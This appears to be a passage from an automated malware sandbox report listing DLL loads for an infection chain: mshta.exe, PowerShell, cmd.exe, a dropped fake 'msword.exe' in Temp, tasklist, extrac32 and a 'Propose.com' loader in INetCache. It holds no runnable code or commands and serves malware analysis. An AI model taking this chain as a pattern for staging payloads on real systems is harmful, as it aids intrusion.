Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Section loaded: winmm.dll
